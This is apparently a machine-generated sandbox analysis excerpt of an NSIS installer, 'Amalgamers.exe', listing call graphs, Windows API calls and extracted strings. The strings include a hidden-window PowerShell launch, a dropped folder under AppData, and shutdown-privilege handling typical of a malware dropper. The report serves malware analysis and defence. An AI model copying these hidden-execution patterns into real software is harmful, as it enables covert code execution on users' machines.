3220->3296 3222 4032f0 3223 405963 CharNextA 3222->3223 3224 403319 CharNextA 3223->3224 3230 403329 3224->3230 3225 4033f3 3226 403406 GetTempPathA 3225->3226 3297 4031db 3226->3297 3228 40341e 3231 403422 GetWindowsDirectoryA lstrcatA 3228->3231 3232 403478 DeleteFileA 3228->3232 3229 405963 CharNextA 3229->3230 3230->3225 3230->3229 3235 4033f5 3230->3235 3234 4031db 12 API calls 3231->3234 3307 402d63 GetTickCount GetModuleFileNameA 3232->3307 3237 40343e 3234->3237 3399 405fa0 lstrcpynA 3235->3399 3236 40348c 3238 403522 3236->3238 3242 403512 3236->3242 3246 405963 CharNextA 3236->3246 3237->3232 3240 403442 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3237->3240 3416 4036f4 3238->3416 3241 4031db 12 API calls 3240->3241 3244 403470 3241->3244 3335 4037ce 3242->3335 3244->3232 3244->3238 3248 4034a7 3246->3248 3257 403552 3248->3257 3258 4034ed 3248->3258 3249 40365a 3251 403662 GetCurrentProcess OpenProcessToken 3249->3251 3252 4036dc ExitProcess 3249->3252 3250 40353c 3253 4056bc MessageBoxIndirectA 3250->3253 3254 4036ad 3251->3254 3255 40367d LookupPrivilegeValueA AdjustTokenPrivileges 3251->3255 3259 40354a ExitProcess 3253->3259 3260 406338 5 API calls 3254->3260 3255->3254 3262 405627 5 API calls 3257->3262 3400 405a26 3258->3400 3264 4036b4 3260->3264 3263 403557 lstrcatA 3262->3263 3266 403573 lstrcatA lstrcmpiA 3263->3266 3267 403568 lstrcatA 3263->3267 3268 4036c9 ExitWindowsEx 3264->3268 3271 4036d5 3264->3271 3266->3238 3270 40358f 3266->3270 3267->3266 3268->3252 3268->3271 3273 403594 3270->3273 3274 40359b 3270->3274 3275 40140b 2 API calls 3271->3275 3272 403507 3415 405fa0 lstrcpynA 3272->3415 3277 40558d 4 API calls 3273->3277 3278 40560a 2 API calls 3274->3278 3275->3252 3279 403599 3277->3279 3280 4035a0 SetCurrentDirectoryA 3278->3280 3279->3280 3281 4035ba 3280->3281 3282 4035af 3280->3282 3391 405fa0 lstrcpynA 3281->3391 3423 405fa0 lstrcpynA 3282->3423 3285 405fc2 17 API calls 3286 4035f9 DeleteFileA 3285->3286 3287 403606 CopyFileA 3286->3287 3292 4035c8 3286->3292 3287->3292 3288 40364e 3290 405d7f 36 API calls 3288->3290 3290->3238 3291 405fc2 17 API calls 3291->3292 3292->3285 3292->3288 3292->3291 3294 40363a CloseHandle 3292->3294 3392 405d7f MoveFileExA 3292->3392 3396 40563f CreateProcessA 3292->3396 3294->3292 3295->3220 3296->3222 3298 40620a 5 API calls 3297->3298 3300 4031e7 3298->3300 3299 4031f1 3299->3228 3300->3299 3301 405938 3 API calls 3300->3301 3302 4031f9 3301->3302 3303 40560a 2 API calls 3302->3303 3304 4031ff 3303->3304 3424 405b68 3304->3424 3428 405b39 GetFileAttributesA CreateFileA 3307->3428 3309 402da3 3328 402db3 3309->3328 3429 405fa0 lstrcpynA 3309->3429 3311 402dc9 3430 40597f lstrlenA 3311->3430 3315 402dda GetFileSize 3316 402ed6 3315->3316 3330 402df1 3315->3330 3435 402cff 3316->3435 3318 402edf 3320 402f0f GlobalAlloc 3318->3320 3318->3328 3447 4031c4 SetFilePointer 3318->3447 3319 4031ae ReadFile 3319->3330 3446 4031c4 SetFilePointer 3320->3446 3322 402f42 3325 402cff 6 API calls 3322->3325 3324 402f2a 3327 402f9c 31 API calls 3324->3327 3325->3328 3326 402ef8 3329 4031ae ReadFile 3326->3329 3333 402f36 3327->3333 3328->3236 3331 402f03 3329->3331 3330->3316 3330->3319 3330->3322 3330->3328 3332 402cff 6 API calls 3330->3332 3331->3320 3331->3328 3332->3330 3333->3328 3333->3333 3334 402f73 SetFilePointer 3333->3334 3334->3328 3336 406338 5 API calls 3335->3336 3337 4037e2 3336->3337 3338 4037e8 3337->3338 3339 4037fa 3337->3339 3460 405efe wsprintfA 3338->3460 3340 405e87 3 API calls 3339->3340 3341 403825 3340->3341 3343 403843 lstrcatA 3341->3343 3345 405e87 3 API calls 3341->3345 3344 4037f8 3343->3344 3452 403a93 3344->3452 3345->3343 3348 405a26 18 API calls 3349 403875 3348->3349 3350 4038fe 3349->3350 3352 405e87 3 API calls 3349->3352 3351 405a26 18 API calls 3350->3351 3353 403904 3351->3353 3354 4038a1 3352->3354 3355 403914 LoadImageA 3353->3355 3356 405fc2 17 API calls 3353->3356 3354->3350 3359 4038bd lstrlenA 3354->3359 3362 405963 CharNextA 3354->3362 3357 4039ba 3355->3357 3358 40393b RegisterClassA 3355->3358 3356->3355 3361 40140b 2 API calls 3357->3361 3360 403971 SystemParametersInfoA CreateWindowExA 3358->3360 3390 4039c4 3358->3390 3363 4038f1 3359->3363 3364 4038cb lstrcmpiA 3359->3364 3360->3357 3365 4039c0 3361->3365 3367 4038bb 3362->3367 3366 405938 3 API calls 3363->3366 3364->3363 3368 4038db GetFileAttributesA 3364->3368 3369 403a93 18 API calls 3365->3369 3365->3390 3370 4038f7 3366->3370 3367->3359 3371 4038e7 3368->3371 3372 4039d1 3369->3372 3461 405fa0 lstrcpynA 3370->3461 3371->3363 3374 40597f 2 API calls 3371->3374 3375 403a60 3372->3375 3376 4039dd ShowWindow 3372->3376 3374->3363 3378 405199 5 API calls 3375->3378 3377 4062ca 3 API calls 3376->3377 3380 4039f5 3377->3380 3379 403a66 3378->3379 3381 403a82 3379->3381 3382 403a6a 3379->3382 3383 403a03 GetClassInfoA 3380->3383 3385 4062ca 3 API calls 3380->3385 3384 40140b 2 API calls 3381->3384 3388 40140b 2 API calls 3382->3388 3382->3390 3386 403a17 GetClassInfoA RegisterClassA 3383->3386 3387 403a2d DialogBoxParamA 3383->3387 3384->3390 3385->3383 3386->3387 3389 40140b 2 API calls 3387->3389 3388->3390 3389->3390 3390->3238 3391->3292 3393 405da0 3392->3393 3394 405d93 3392->3394 3393->3292 3463 405c0f 3394->3463 3397 405672 CloseHandle 3396->3397 3398 40567e 3396->3398 3397->3398 3398->3292 3399->3226 3497 405fa0 lstrcpynA 3400->3497 3402 405a37 3403 4059d1 4 API calls 3402->3403 3404 405a3d 3403->3404 3405 4034f8 3404->3405 3406 40620a 5 API calls 3404->3406 3405->3238 3414 405fa0 lstrcpynA 3405->3414 3412 405a4d 3406->3412 3407 405a78 lstrlenA 3408 405a83 3407->3408 3407->3412 3410 405938 3 API calls 3408->3410 3409 4062a3 2 API calls 3409->3412 3411 405a88 GetFileAttributesA 3410->3411 3411->3405 3412->3405 3412->3407 3412->3409 3413 40597f 2 API calls 3412->3413 3413->3407 3414->3272 3415->3242 3417 40370c 3416->3417 3418 4036fe CloseHandle 3416->3418 3498 403739 3417->3498 3418->3417 3423->3281 3425 405b73 GetTickCount GetTempFileNameA 3424->3425 3426 405ba0 3425->3426 3427 40320a 3425->3427 3426->3425 3426->3427 3427->3228 3428->3309 3429->3311 3431 40598c 3430->3431 3432 405991 CharPrevA 3431->3432 3433 402dcf 3431->3433 3432->3431 3432->3433 3434 405fa0 lstrcpynA 3433->3434 3434->3315 3436 402d20 3435->3436 3437 402d08 3435->3437 3438 402d30 GetTickCount 3436->3438 3439 402d28 3436->3439 3440 402d11 DestroyWindow 3437->3440 3441 402d18 3437->3441 3443 402d61 3438->3443 3444 402d3e CreateDialogParamA ShowWindow 3438->3444 3448 406374 3439->3448 3440->3441 3441->3318 3443->3318 3444->3443 3446->3324 3447->3326 3449 406391 PeekMessageA 3448->3449 3450 402d2e 3449->3450 3451 406387 DispatchMessageA 3449->3451 3450->3318 3451->3449 3453 403aa7 3452->3453 3462 405efe wsprintfA 3453->3462 3455 403b18 3456 403b4c 18 API calls 3455->3456 3458 403b1d 3456->3458 3457 403853 3457->3348 3458->3457 3459 405fc2 17 API calls 3458->3459 3459->3458 3460->3344 3461->3350 3462->3455 3464 405c35 3463->3464 3465 405c5b GetShortPathNameA 3463->3465 3490 405b39 GetFileAttributesA CreateFileA 3464->3490 3467 405c70 3465->3467 3468 405d7a 3465->3468 3467->3468 3470 405c78 wsprintfA 3467->3470 3468->3393 3469 405c3f CloseHandle GetShortPathNameA 3469->3468 3471 405c53 3469->3471 3472 405fc2 17 API calls 3470->3472 3471->3465 3471->3468 3473 405ca0 3472->3473 3491 405b39 GetFileAttributesA CreateFileA 3473->3491 3475 405cad 3475->3468 3476 405cbc GetFileSize GlobalAlloc 3475->3476 3477 405d73 CloseHandle 3476->3477 3478 405cde 3476->3478 3477->3468 3479 405bb1 ReadFile 3478->3479 3480 405ce6 3479->3480 3480->3477 3492 405a9e lstrlenA 3480->3492 3483 405d11 3485 405a9e 4 API calls 3483->3485 3484 405cfd lstrcpyA 3486 405d1f 3484->3486 3485->3486 3487 405d56 SetFilePointer 3486->3487 3488 405be0 WriteFile 3487->3488 3489 405d6c GlobalFree 3488->3489 3489->3477 3490->3469 3491->3475 3493 405adf lstrlenA 3492->3493 3494 405ab8 lstrcmpiA 3493->3494 3495 405ae7 3493->3495 3494->3495 3496 405ad6 CharNextA 3494->3496 3495->3483 3495->3484 3496->3493 3497->3402 3499 403747 3498->3499 3500 403711 3499->3500 3501 40374c FreeLibrary GlobalFree 3499->3501 3502 405768 3500->3502 3501->3500 3501->3501 3503 405a26 18 API calls 3502->3503 3504 405788 3503->3504 3505 405790 DeleteFileA 3504->3505 3506 4057a7 3504->3506 3510 40352b OleUninitialize 3505->3510 3507 4058d5 3506->3507 3539 405fa0 lstrcpynA 3506->3539 3507->3510 3513 4062a3 2 API calls 3507->3513 3509 4057cd 3511 4057e0 3509->3511 3512 4057d3 lstrcatA 3509->3512 3510->3249 3510->3250 3515 40597f 2 API calls 3511->3515 3514 4057e6 3512->3514 3516 4058f9 3513->3516 3517 4057f4 lstrcatA 3514->3517 3518 4057ff lstrlenA FindFirstFileA 3514->3518 3515->3514 3516->3510 3519 405938 3 API calls 3516->3519 3517->3518 3518->3507 3537 405823 3518->3537 3520 405903 3519->3520 3522 405720 5 API calls 3520->3522 3521 405963 CharNextA 3521->3537 3523 40590f 3522->3523 3524 405913 3523->3524 3525 405929 3523->3525 3524->3510 3530 4050c7 24 API calls 3524->3530 3526 4050c7 24 API calls 3525->3526 3526->3510 3527 4058b4 FindNextFileA 3529 4058cc FindClose 3527->3529 3527->3537 3529->3507 3531 405920 3530->3531 3532 405d7f 36 API calls 3531->3532 3532->3510 3534 405768 60 API calls 3534->3537 3535 4050c7 24 API calls 3535->3527 3536 4050c7 24 API calls 3536->3537 3537->3521 3537->3527 3537->3534 3537->3535 3537->3536 3538 405d7f 36 API calls 3537->3538 3540 405fa0 lstrcpynA 3537->3540 3541 405720 3537->3541 3538->3537 3539->3509 3540->3537 3542 405b14 2 API calls 3541->3542 3543 40572c 3542->3543 3544 405743 DeleteFileA 3543->3544 3545 40573b RemoveDirectoryA 3543->3545 3546 40574d 3543->3546 3547 405749 3544->3547 3545->3547 3546->3537 3547->3546 3548 405759 SetFileAttributesA 3547->3548 3548->3546 4059 40378c 4060 403797 4059->4060 4061 40379b 4060->4061 4062 40379e GlobalAlloc 4060->4062 4062->4061 4063 401490 4064 4050c7 24 API calls 4063->4064 4065 401497 4064->4065 4066 401d9b GetDC 4067 402aa9 17 API calls 4066->4067 4068 401dad GetDeviceCaps MulDiv ReleaseDC 4067->4068 4069 402aa9 17 API calls 4068->4069 4070 401dde 4069->4070 4071 405fc2 17 API calls 4070->4071 4072 401e1b CreateFontIndirectA 4071->4072 4073 40257d 4072->4073 3549 40159d 3550 402acb 17 API calls 3549->3550 3551 4015a4 SetFileAttributesA 3550->3551 3552 4015b6 3551->3552 4074 40149d 4075 4022e7 4074->4075 4076 4014ab PostQuitMessage 4074->4076 4076->4075 4077 401a1e 4078 402acb 17 API calls 4077->4078 4079 401a27 ExpandEnvironmentStringsA 4078->4079 4080 401a3b 4079->4080 4082 401a4e 4079->4082 4081 401a40 lstrcmpA 4080->4081 4080->4082 4081->4082 4088 40171f 4089 402acb 17 API calls 4088->4089 4090 401726 SearchPathA 4089->4090 4091 401741 4090->4091 4092 401d20 4093 402aa9 17 API calls 4092->4093 4094 401d2e SetWindowLongA 4093->4094 4095 402957 4094->4095 4096 404822 4097 404832 4096->4097 4098 40484e 4096->4098 4107 4056a0 GetDlgItemTextA 4097->4107 4100 404881 4098->4100 4101 404854 SHGetPathFromIDListA 4098->4101 4103 404864 4101->4103 4106 40486b SendMessageA 4101->4106 4102 40483f SendMessageA 4102->4098 4104 40140b 2 API calls 4103->4104 4104->4106 4106->4100 4107->4102 4108 4041aa 4109 4041c0 4108->4109 4114 4042cc 4108->4114 4112 40403f 18 API calls 4109->4112 4110 40433b 4111 404405 4110->4111 4113 404345 GetDlgItem 4110->4113 4120 4040a6 8 API calls 4111->4120 4115 404216 4112->4115 4116 4043c3 4113->4116 4117 40435b 4113->4117 4114->4110 4114->4111 4118 404310 GetDlgItem SendMessageA 4114->4118 4119 40403f 18 API calls 4115->4119 4116->4111 4123 4043d5 4116->4123 4117->4116 4122 404381 SendMessageA LoadCursorA SetCursor 4117->4122 4141 404061 KiUserCallbackDispatcher 4118->4141 4125 404223 CheckDlgButton 4119->4125 4121 404400 4120->4121 4142 40444e 4122->4142 4127 4043db SendMessageA 4123->4127 4128 4043ec 4123->4128 4139 404061 KiUserCallbackDispatcher 4125->4139 4127->4128 4128->4121 4133 4043f2 SendMessageA 4128->4133 4129 404336 4134 40442a SendMessageA 4129->4134 4131 404241 GetDlgItem 4140 404074 SendMessageA 4131->4140 4133->4121 4134->4110 4136 404257 SendMessageA 4137 404275 GetSysColor 4136->4137 4138 40427e SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4136->4138 4137->4138 4138->4121 4139->4131 4140->4136 4141->4129 4145 405682 ShellExecuteExA 4142->4145 4144 4043b4 LoadCursorA SetCursor 4144->4116 4145->4144 4146 401e2b 4147 402aa9 17 API calls 4146->4147 4148 401e31 4147->4148 4149 402aa9 17 API calls 4148->4149 4150 401e3d 4149->4150 4151 401e54 EnableWindow 4150->4151 4152 401e49 ShowWindow 4150->4152 4153 402957 4151->4153 4152->4153 4154 4063ad WaitForSingleObject 4155 4063c7 4154->4155 4156 4063d9 GetExitCodeProcess 4155->4156 4157 406374 2 API calls 4155->4157 4158 4063ce WaitForSingleObject 4157->4158 4158->4155 4159 401f31 4160 402acb 17 API calls 4159->4160 4161 401f38 4160->4161 4162 4062a3 2 API calls 4161->4162 4163 401f3e 4162->4163 4164 401f50 4163->4164 4166 405efe wsprintfA 4163->4166 4166->4164 4173 402932 SendMessageA 4174 402957 4173->4174 4175 40294c InvalidateRect 4173->4175 4175->4174 4176 4014b7 4177 4014bd 4176->4177 4178 401389 2 API calls 4177->4178 4179 4014c5 4178->4179 4180 4026ba 4181 4026c0 4180->4181 4182 402957 4181->4182 4183 4026c8 FindClose 4181->4183 4183->4182 3155 4015bb 3156 402acb 17 API calls 3155->3156 3157 4015c2 3156->3157 3175 4059d1 CharNextA CharNextA 3157->3175 3159 4015ca 3160 401624 3159->3160 3162 405963 CharNextA 3159->3162 3171 4015f3 3159->3171 3172 40160c GetFileAttributesA 3159->3172 3185 405627 3159->3185 3193 40560a CreateDirectoryA 3159->3193 3161 401629 3160->3161 3164 401652 3160->3164 3181 401423 3161->3181 3162->3159 3166 401423 24 API calls 3164->3166 3173 40164a 3166->3173 3170 40163b SetCurrentDirectoryA 3170->3173 3171->3159 3188 40558d CreateDirectoryA 3171->3188 3172->3159 3176 4059ec 3175->3176 3180 4059fc 3175->3180 3178 4059f7 CharNextA 3176->3178 3176->3180 3177 405a1c 3177->3159 3178->3177 3179 405963 CharNextA 3179->3180 3180->3177 3180->3179 3182 4050c7 24 API calls 3181->3182 3183 401431 3182->3183 3184 405fa0 lstrcpynA 3183->3184 3184->3170 3196 406338 GetModuleHandleA 3185->3196 3189 4055de GetLastError 3188->3189 3190 4055da 3188->3190 3189->3190 3191 4055ed SetFileSecurityA 3189->3191 3190->3171 3191->3190 3192 405603 GetLastError 3191->3192 3192->3190 3194 40561a 3193->3194 3195 40561e GetLastError 3193->3195 3194->3159 3195->3194 3197 406354 3196->3197 3198 40635e GetProcAddress 3196->3198 3202 4062ca GetSystemDirectoryA 3197->3202 3200 40562e 3198->3200 3200->3159 3201 40635a 3201->3198 3201->3200 3203 4062ec wsprintfA LoadLibraryExA 3202->3203 3203->3201 4184 40503b 4185 40504b 4184->4185 4186 40505f 4184->4186 4187 405051 4185->4187 4196 4050a8 4185->4196 4188 405067 IsWindowVisible 4186->4188 4192 40507e 4186->4192 4190 40408b SendMessageA 4187->4190 4191 405074 4188->4191 4188->4196 4189 4050ad CallWindowProcA 4193 40505b 4189->4193 4190->4193 4194 404992 5 API calls 4191->4194 4192->4189 4195 404a12 4 API calls 4192->4195 4194->4192 4195->4196 4196->4189 4197 4016bb 4198 402acb 17 API calls 4197->4198 4199 4016c1 GetFullPathNameA 4198->4199 4200 4016d8 4199->4200 4206 4016f9 4199->4206 4203 4062a3 2 API calls 4200->4203 4200->4206 4201 402957 4202 40170d GetShortPathNameA 4202->4201 4204 4016e9 4203->4204 4204->4206 4207 405fa0 lstrcpynA 4204->4207 4206->4201 4206->4202 4207->4206 4208 40273c 4209 402acb 17 API calls 4208->4209 4211 40274a 4209->4211 4210 402760 4212 405b14 2 API calls 4210->4212 4211->4210 4213 402acb 17 API calls 4211->4213 4214 402766 4212->4214 4213->4210 4236 405b39 GetFileAttributesA CreateFileA 4214->4236 4216 402773 4217 40281c 4216->4217 4218 40277f GlobalAlloc 4216->4218 4221 402824 DeleteFileA 4217->4221 4222 402837 4217->4222 4219 402813 CloseHandle 4218->4219 4220 402798 4218->4220 4219->4217 4237 4031c4 SetFilePointer 4220->4237 4221->4222 4224 40279e 4225 4031ae ReadFile 4224->4225 4226 4027a7 GlobalAlloc 4225->4226 4227 4027f1 4226->4227 4228 4027b7 4226->4228 4229 405be0 WriteFile 4227->4229 4230 402f9c 31 API calls 4228->4230 4231 4027fd GlobalFree 4229->4231 4235 4027c4 4230->4235 4232 402f9c 31 API calls 4231->4232 4234 402810 4232->4234 4233 4027e8 GlobalFree 4233->4227 4234->4219 4235->4233 4236->4216 4237->4224 4238 401b3f 4239 402acb 17 API calls 4238->4239 4240 401b46 4239->4240 4241 402aa9 17 API calls 4240->4241 4242 401b4f wsprintfA 4241->4242 4243 402957 4242->4243

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 40320c-40324b SetErrorMode GetVersion 1 40324d-403255 call 406338 0->1 2 40325e 0->2 1->2 7 403257 1->7 4 403263-403276 call 4062ca lstrlenA 2->4 9 403278-403294 call 406338 * 3 4->9 7->2 16 4032a5-403303 #17 OleInitialize SHGetFileInfoA call 405fa0 GetCommandLineA call 405fa0 9->16 17 403296-40329c 9->17 24 403305-40330a 16->24 25 40330f-403324 call 405963 CharNextA 16->25 17->16 21 40329e 17->21 21->16 24->25 28 4033e9-4033ed 25->28 29 4033f3 28->29 30 403329-40332c 28->30 33 403406-403420 GetTempPathA call 4031db 29->33 31 403334-40333c 30->31 32 40332e-403332 30->32 34 403344-403347 31->34 35 40333e-40333f 31->35 32->31 32->32 43 403422-403440 GetWindowsDirectoryA lstrcatA call 4031db 33->43 44 403478-403492 DeleteFileA call 402d63 33->44 37 4033d9-4033e6 call 405963 34->37 38 40334d-403351 34->38 35->34 37->28 53 4033e8 37->53 41 403353-403359 38->41 42 403369-403396 38->42 47 40335b-40335d 41->47 48 40335f 41->48 49 403398-40339e 42->49 50 4033a9-4033d7 42->50 43->44 61 403442-403472 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4031db 43->61 58 403526-403536 call 4036f4 OleUninitialize 44->58 59 403498-40349e 44->59 47->42 47->48 48->42 55 4033a0-4033a2 49->55 56 4033a4 49->56 50->37 52 4033f5-403401 call 405fa0 50->52 52->33 53->28 55->50 55->56 56->50 72 40365a-403660 58->72 73 40353c-40354c call 4056bc ExitProcess 58->73 63 4034a0-4034ab call 405963 59->63 64 403516-40351d call 4037ce 59->64 61->44 61->58 76 4034e1-4034eb 63->76 77 4034ad-4034d6 63->77 70 403522 64->70 70->58 74 403662-40367b GetCurrentProcess OpenProcessToken 72->74 75 4036dc-4036e4 72->75 79 4036ad-4036bb call 406338 74->79 80 40367d-4036a7 LookupPrivilegeValueA AdjustTokenPrivileges 74->80 82 4036e6 75->82 83 4036ea-4036ee ExitProcess 75->83 84 403552-403566 call 405627 lstrcatA 76->84 85 4034ed-4034fa call 405a26 76->85 81 4034d8-4034da 77->81 97 4036c9-4036d3 ExitWindowsEx 79->97 98 4036bd-4036c7 79->98 80->79 81->76 88 4034dc-4034df 81->88 82->83 95 403573-40358d lstrcatA lstrcmpiA 84->95 96 403568-40356e lstrcatA 84->96 85->58 94 4034fc-403512 call 405fa0 * 2 85->94 88->76 88->81 94->64 95->58 100 40358f-403592 95->100 96->95 97->75 101 4036d5-4036d7 call 40140b 97->101 98->97 98->101 103 403594-403599 call 40558d 100->103 104 40359b call 40560a 100->104 101->75 112 4035a0-4035ad SetCurrentDirectoryA 103->112 104->112 113 4035ba-4035e2 call 405fa0 112->113 114 4035af-4035b5 call 405fa0 112->114 118 4035e8-403604 call 405fc2 DeleteFileA 113->118 114->113 121 403645-40364c 118->121 122 403606-403616 CopyFileA 118->122 121->118 124 40364e-403655 call 405d7f 121->124 122->121 123 403618-403631 call 405d7f call 405fc2 call 40563f 122->123 132 403636-403638 123->132 124->58 132->121 133 40363a-403641 CloseHandle 132->133 133->121
                                        APIs
                                        • SetErrorMode.KERNELBASE ref: 00403231
                                        • GetVersion.KERNEL32 ref: 00403237
                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040326A
                                        • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004032A6
                                        • OleInitialize.OLE32(00000000), ref: 004032AD
                                        • SHGetFileInfoA.SHELL32(00429830,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004032C9
                                        • GetCommandLineA.KERNEL32(Topfartens Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004032DE
                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Amalgamers.exe",00000020,"C:\Users\user\Desktop\Amalgamers.exe",00000000,?,00000006,00000008,0000000A), ref: 0040331A
                                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 00403417
                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 00403428
                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403434
                                        • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403448
                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403450
                                        • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403461
                                        • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403469
                                        • DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040347D
                                          • Part of subcall function 00406338: GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
                                          • Part of subcall function 00406338: GetProcAddress.KERNEL32(00000000,?), ref: 00406365
                                          • Part of subcall function 004037CE: lstrlenA.KERNEL32(Execute: ,?,?,?,Execute: ,00000000,C:\Users\user\AppData\Local\Reglements216,1033,Topfartens Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Topfartens Setup: Installing,00000000,00000002,74DF3410), ref: 004038BE
                                          • Part of subcall function 004037CE: lstrcmpiA.KERNEL32(?,.exe), ref: 004038D1
                                          • Part of subcall function 004037CE: GetFileAttributesA.KERNEL32(Execute: ), ref: 004038DC
                                          • Part of subcall function 004037CE: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Reglements216), ref: 00403925
                                          • Part of subcall function 004037CE: RegisterClassA.USER32(0042EBA0), ref: 00403962
                                          • Part of subcall function 004036F4: CloseHandle.KERNEL32(000002C8,0040352B,?,?,00000006,00000008,0000000A), ref: 004036FF
                                        • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 0040352B
                                        • ExitProcess.KERNEL32 ref: 0040354C
                                        • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403669
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00403670
                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403688
                                        • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004036A7
                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 004036CB
                                        • ExitProcess.KERNEL32 ref: 004036EE
                                          • Part of subcall function 004056BC: MessageBoxIndirectA.USER32(0040A218), ref: 00405717
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                        • String ID: "$"C:\Users\user\Desktop\Amalgamers.exe"$.tmp$1033$C:\Users\user\AppData\Local\Reglements216$C:\Users\user\AppData\Local\Reglements216\Fessewise$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Amalgamers.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$Topfartens Setup$UXTHEME$\Temp$`Kt$powershell.exe -windowstyle hidden$~nsu
                                        • API String ID: 3776617018-4064138589
                                        • Opcode ID: aa8e0ef1eb72b8bc744683be083ef578b0b61129bd2ec06390cc6719ef15a54d
                                        • Instruction ID: 947ab88924f8c3b38e2aea5cfaab7316d1dfac26a51a196f62222c0ed64aafcd
                                        • Opcode Fuzzy Hash: aa8e0ef1eb72b8bc744683be083ef578b0b61129bd2ec06390cc6719ef15a54d
                                        • Instruction Fuzzy Hash: EEC1D470604741AAD7216F759E89B2F3EACAF45706F44053FF581B61E2CB7C8A058B2E

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 134 405205-405221 135 4053b0-4053b6 134->135 136 405227-4052ee GetDlgItem * 3 call 404074 call 404965 GetClientRect GetSystemMetrics SendMessageA * 2 134->136 137 4053e0-4053ec 135->137 138 4053b8-4053da GetDlgItem CreateThread CloseHandle 135->138 154 4052f0-40530a SendMessageA * 2 136->154 155 40530c-40530f 136->155 141 40540e-405414 137->141 142 4053ee-4053f4 137->142 138->137 146 405416-40541c 141->146 147 405469-40546c 141->147 144 4053f6-405409 ShowWindow * 2 call 404074 142->144 145 40542f-405436 call 4040a6 142->145 144->141 158 40543b-40543f 145->158 151 405442-405452 ShowWindow 146->151 152 40541e-40542a call 404018 146->152 147->145 149 40546e-405474 147->149 149->145 156 405476-405489 SendMessageA 149->156 159 405462-405464 call 404018 151->159 160 405454-40545d call 4050c7 151->160 152->145 154->155 162 405311-40531d SendMessageA 155->162 163 40531f-405336 call 40403f 155->163 164 405586-405588 156->164 165 40548f-4054bb CreatePopupMenu call 405fc2 AppendMenuA 156->165 159->147 160->159 162->163 173 405338-40534c ShowWindow 163->173 174 40536c-40538d GetDlgItem SendMessageA 163->174 164->158 171 4054d0-4054e6 TrackPopupMenu 165->171 172 4054bd-4054cd GetWindowRect 165->172 171->164 175 4054ec-405506 171->175 172->171 176 40535b 173->176 177 40534e-405359 ShowWindow 173->177 174->164 178 405393-4053ab SendMessageA * 2 174->178 179 40550b-405526 SendMessageA 175->179 180 405361-405367 call 404074 176->180 177->180 178->164 179->179 181 405528-405548 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 179->181 180->174 183 40554a-40556a SendMessageA 181->183 183->183 184 40556c-405580 GlobalUnlock SetClipboardData CloseClipboard 183->184 184->164
                                        APIs
